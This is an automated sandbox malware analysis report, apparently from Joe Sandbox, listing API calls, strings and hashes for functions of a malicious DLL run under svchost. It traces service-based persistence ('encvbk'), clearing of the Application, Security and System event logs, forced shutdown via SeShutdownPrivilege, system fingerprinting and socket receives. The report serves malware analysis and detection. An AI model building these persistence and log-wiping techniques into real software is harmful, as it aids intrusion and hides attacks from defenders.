                                                                                          • Instruction ID: 2672780922b42b35e2a89e682ca47f3d516b1e1a70e82393c56e9bdbe1b2b31e
                                                                                          • Opcode Fuzzy Hash: 01154ca105bfda5f078472489b81bc39b1063e4cdbc4f1aa553d48ab01563500
                                                                                          • Instruction Fuzzy Hash: CE211DA28001287BF710E794DC89DFF76BDEB4D695F5400A6FA01E1049EB39AE418775
                                                                                          Function 10001B5B Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 176serviceCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,00000000), ref: 10001B96
                                                                                          • _local_unwind2.MSVCRT ref: 10001BA9
                                                                                          • CreateServiceA.ADVAPI32(00000000,00000000,00000000,000F01FF,?,10001E9B,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 10001BE6
                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 10001BF5
                                                                                          • OpenServiceA.ADVAPI32(10001E9B,00000000,000F01FF,?,00000000), ref: 10001C09
                                                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,00000000), ref: 10001C1F
                                                                                          • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?,?,00000000), ref: 10001C43
                                                                                          • ChangeServiceConfig2A.ADVAPI32(00000000,00000002,?), ref: 10001CA3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$ChangeConfig2Open$CreateErrorLastManagerStart_local_unwind2
                                                                                          • String ID: Description$SYSTEM\CurrentControlSet\Services\%s
                                                                                          • API String ID: 1109860625-2908613140
                                                                                          • Opcode ID: ae27365f3abc695d381728d134456e741ffe8850672492339ff11c7de2e79d22
                                                                                          • Instruction ID: 34160cdb049149ef51204cb724d21122ba78e6005a4a2cbc3d1f025aef1d8869
                                                                                          • Opcode Fuzzy Hash: ae27365f3abc695d381728d134456e741ffe8850672492339ff11c7de2e79d22
                                                                                          • Instruction Fuzzy Hash: E6813270C086A8DEEB21CB64CC88BDEBFB5AB19344F0401D9E55C66291C77A0F94CF65
                                                                                          Function 10001A43 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 53servicesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,encvbk,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A54
                                                                                          • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A69
                                                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A7A
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A84
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A92
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001AA0
                                                                                          • Sleep.KERNEL32(00000064), ref: 10001AB2
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001ABB
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001AC2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ErrorLastManagerQuerySleepStartStatus
                                                                                          • String ID: encvbk
                                                                                          • API String ID: 191932718-1002245020
                                                                                          • Opcode ID: 014086cccfa01bbc5a08c9c9583791d5995df2f921ac7ee13cb4fdb749c4e3c5
                                                                                          • Instruction ID: 9ee7ec8bb55b1ac22ac6ce330aaae550d3e81ab1b6a3f2d0b0f6497ceb73b83b
                                                                                          • Opcode Fuzzy Hash: 014086cccfa01bbc5a08c9c9583791d5995df2f921ac7ee13cb4fdb749c4e3c5
                                                                                          • Instruction Fuzzy Hash: 33012531746327EBF711ABA05CC9FEF36A9EB0A7C1F200420F602D9099DB65884186E6
                                                                                          Function 10002BC3 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77stringprocessCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 10002BD1
                                                                                          • memset.MSVCRT ref: 10002BEF
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • lstrlenA.KERNEL32(?), ref: 10002C1E
                                                                                          • strstr.MSVCRT ref: 10002C34
                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 10002C44
                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002C8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$CreateFreeLoadProcesslstrcpylstrlenstrlenstrstr
                                                                                          • String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
                                                                                          • API String ID: 2952214944-490771695
                                                                                          • Opcode ID: 7fd2577a0a9b6326ac895a1fa05e515703ef0ef4a7097cdaa6f8a03547f7ada4
                                                                                          • Instruction ID: 41262b3153465784fb7137690828f40fbae5b7cfa485d5802afb8d228550aeb8
                                                                                          • Opcode Fuzzy Hash: 7fd2577a0a9b6326ac895a1fa05e515703ef0ef4a7097cdaa6f8a03547f7ada4
                                                                                          • Instruction Fuzzy Hash: 46216A72900128AAFF60CBE1CD48EDF7BBCEF453D2F100015BA09E6048DA719A84CBA0
                                                                                          Function 1000265E Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenEventLogA.ADVAPI32(00000000,Application), ref: 100026B8
                                                                                          • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 100026C7
                                                                                          • CloseEventLog.ADVAPI32(00000000), ref: 100026CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$ClearCloseOpen
                                                                                          • String ID: (b$Application$Security$System
                                                                                          • API String ID: 1391105993-346596376
                                                                                          • Opcode ID: 979e5dc6c9d061fd1560a2a7781cfa77c6718ec7c1a2c36edda2fbc21b44326a
                                                                                          • Instruction ID: bc44e267b22650a43e45f5af2b99767b5e3e23e3035c63c9d4cfe444952d6dd8
                                                                                          • Opcode Fuzzy Hash: 979e5dc6c9d061fd1560a2a7781cfa77c6718ec7c1a2c36edda2fbc21b44326a
                                                                                          • Instruction Fuzzy Hash: 5D018F71E00A99BBFB00DF94984479DBFB4EB097C9FA04095E506EB248D73A8E408F95
                                                                                          Function 10001F48 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47servicestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 10001F4E
                                                                                            • Part of subcall function 10001ACF: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                            • Part of subcall function 10001ACF: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                            • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                            • Part of subcall function 10001ACF: ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                            • Part of subcall function 10001ACF: Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                            • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                            • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                            • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,?,?,?,?,10002F76,encvbk), ref: 10001F6B
                                                                                          • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,10002F76,encvbk), ref: 10001F7F
                                                                                          • DeleteService.ADVAPI32(00000000,?,?,?,?,10002F76,encvbk), ref: 10001F8C
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10002F76,encvbk), ref: 10001F93
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10002F76,encvbk), ref: 10001F9A
                                                                                          Strings
                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10001FA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandleOpen$ManagerQueryStatus$ControlDeleteSleepstrlen
                                                                                          • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                                                          • API String ID: 625463800-1784019800
                                                                                          • Opcode ID: 02807cd9fc2c2d172a8d2777ce926d73bc9f3961fff41b6754e738332fe71101
                                                                                          • Instruction ID: 320e00f64ca60edd69a113f9dbbd44adb98dc69d7bce9bbf9f1d19ab5e200103
                                                                                          • Opcode Fuzzy Hash: 02807cd9fc2c2d172a8d2777ce926d73bc9f3961fff41b6754e738332fe71101
                                                                                          • Instruction Fuzzy Hash: 39F096B610912A7FF1106771ECCCDBF7E6DDB4E2D6B120428F5055600ECF2658418571
                                                                                          Function 1000358C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 100035C9
                                                                                          • wsprintfA.USER32 ref: 100035DE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$FreeInfoLoadSystemwsprintf
                                                                                          • String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                          • API String ID: 86330591-2169120903
                                                                                          • Opcode ID: dc211f4c5e3334b9a75a581acafed69773f2644d7a1948e9a9c8f06f08de0db5
                                                                                          • Instruction ID: e0e52339f3a0edf701dd4b0822ed73eda2d577ef34cae91861143d544cce4ff8
                                                                                          • Opcode Fuzzy Hash: dc211f4c5e3334b9a75a581acafed69773f2644d7a1948e9a9c8f06f08de0db5
                                                                                          • Instruction Fuzzy Hash: 93F054B1900149BFFB04DBE8CD05DEEBB6DDB1C144F200464FB01F5055E6629A148766
                                                                                          Function 10003D5D Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,00000000,?,?,100039AB,00000000), ref: 10003D99
                                                                                          • free.MSVCRT ref: 10003DA8
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,100039AB,00000000), ref: 10003DBE
                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,100039AB,00000000), ref: 10003DC6
                                                                                          • HeapFree.KERNEL32(00000000), ref: 10003DCD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Free$Heap$LibraryProcessVirtualfree
                                                                                          • String ID:
                                                                                          • API String ID: 831075735-0
                                                                                          • Opcode ID: 667178307696715c23ee8a0b861fe9ca313d72f521eb66f714d6403ad810cf37
                                                                                          • Instruction ID: 71511c0ad6a298159b0eec715adc94005effd13d7d75cd72595928e5cffca51a
                                                                                          • Opcode Fuzzy Hash: 667178307696715c23ee8a0b861fe9ca313d72f521eb66f714d6403ad810cf37
                                                                                          • Instruction Fuzzy Hash: DC01ED72500611AFE7219FA5DCC895BB7EDFB443A1311892EF19A93554C731BC45CB50
                                                                                          Function 1000152B Relevance: 4.6, APIs: 3, Instructions: 72networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10001581
                                                                                          • memset.MSVCRT ref: 10001599
                                                                                          • recv.WS2_32(?,?,00002000,00000000), ref: 100015B0
                                                                                            • Part of subcall function 10001603: __EH_prolog.LIBCMT ref: 10001608
                                                                                            • Part of subcall function 10001603: memcmp.MSVCRT(?,?,00000003,00000000,00000000,00002000), ref: 10001635
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prologmemcmpmemsetrecvselect
                                                                                          • String ID:
                                                                                          • API String ID: 845096623-0
                                                                                          • Opcode ID: 75ccf4472247f99d1fc82cf152b3949a0f6c798424c0c4ef67da7dbc52851d33
                                                                                          • Instruction ID: b249bad086b58afcbe69b5c97c14a2d47d410cce536c228878a31608307147f8
                                                                                          • Opcode Fuzzy Hash: 75ccf4472247f99d1fc82cf152b3949a0f6c798424c0c4ef67da7dbc52851d33
                                                                                          • Instruction Fuzzy Hash: E3216376500128ABEB20CBA5DC88DCF7BADEF853E1F100565F51A9B195DB30AE85CA90
                                                                                          Function 100025A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17shutdownCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 10004666: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege), ref: 1000467E
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000468E
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 10004699
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100046A4
                                                                                            • Part of subcall function 10004666: LoadLibraryA.KERNEL32(kernel32.dll,?,SeShutdownPrivilege), ref: 100046AE
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100046B9
                                                                                            • Part of subcall function 10004666: LoadLibraryA.KERNEL32(KERNEL32.dll,?,SeShutdownPrivilege), ref: 10004701
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 10004709
                                                                                            • Part of subcall function 10004666: CloseHandle.KERNEL32(?,?,SeShutdownPrivilege), ref: 10004718
                                                                                            • Part of subcall function 10004666: FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004729
                                                                                            • Part of subcall function 10004666: FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004734
                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 100025B8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 3789203340-3733053543
                                                                                          • Opcode ID: e4fba66ba179fd9c90d11779b271753c7a602678899a700a7ffa0e43bc127d12
                                                                                          • Instruction ID: 24361d1f74b491916104d0b65e9654eb6268adfd09238d66ad51a9c89c1c7c7a
                                                                                          • Opcode Fuzzy Hash: e4fba66ba179fd9c90d11779b271753c7a602678899a700a7ffa0e43bc127d12
                                                                                          • Instruction Fuzzy Hash: 55D0C93614D7203AF6259310FC07F891386DB46A60F32005AF100281D9EE97394101DE
                                                                                          Function 10004822 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 183libraryloaderstringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 10004857
                                                                                          • memset.MSVCRT ref: 1000486A
                                                                                          • memset.MSVCRT ref: 10004878
                                                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                          • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                          • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                          • GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                          • GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                          • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                          • strchr.MSVCRT ref: 10004991
                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A3F
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$FreeLoadlstrcpystrchr
                                                                                          • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                                                                                          • API String ID: 3659255042-2913591164
                                                                                          • Opcode ID: 7424f0aa0fc5f41e5269731e09dcfb498a038a30a4bf35bef428207efb807e24
                                                                                          • Instruction ID: 7827c6d97ea14ff7f97f876e2ede93deda3ff4f1abfb71c7f8a3dc5e2b71a7d8
                                                                                          • Opcode Fuzzy Hash: 7424f0aa0fc5f41e5269731e09dcfb498a038a30a4bf35bef428207efb807e24
                                                                                          • Instruction Fuzzy Hash: 3761F9B190111DABEF21DFA0CD84EEFBBB9FB49390F1101A6F609A2114DB319E548F65
                                                                                          Function 100027BC Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 180stringprocessCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memset$lstrcatstrrchrstrstr$CreateEnvironmentExpandProcessStringslstrcpystrcpystrlenstrncpywsprintf
                                                                                          • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                          • API String ID: 4079107157-33419044
                                                                                          • Opcode ID: 04d3fabc052defb42953b4d487a01b0e0a3a75e7128b93fa4fdb2158ee315547
                                                                                          • Instruction ID: 1dae266835ad86fc393f082bb566385ae5bfce16840cf251a65e311cd9e83007
                                                                                          • Opcode Fuzzy Hash: 04d3fabc052defb42953b4d487a01b0e0a3a75e7128b93fa4fdb2158ee315547
                                                                                          • Instruction Fuzzy Hash: 86514FB690062DBFFB10CBE0CD89EDF777CEB05395F1044A6F604E6144DA719A498BA0
                                                                                          Function 10004666 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 84libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege), ref: 1000467E
                                                                                          • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000468E
                                                                                          • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 10004699
                                                                                          • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100046A4
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,SeShutdownPrivilege), ref: 100046AE
                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100046B9
                                                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,?,SeShutdownPrivilege), ref: 10004701
                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 10004709
                                                                                          • CloseHandle.KERNEL32(?,?,SeShutdownPrivilege), ref: 10004718
                                                                                          • FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004729
                                                                                          • FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004734
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
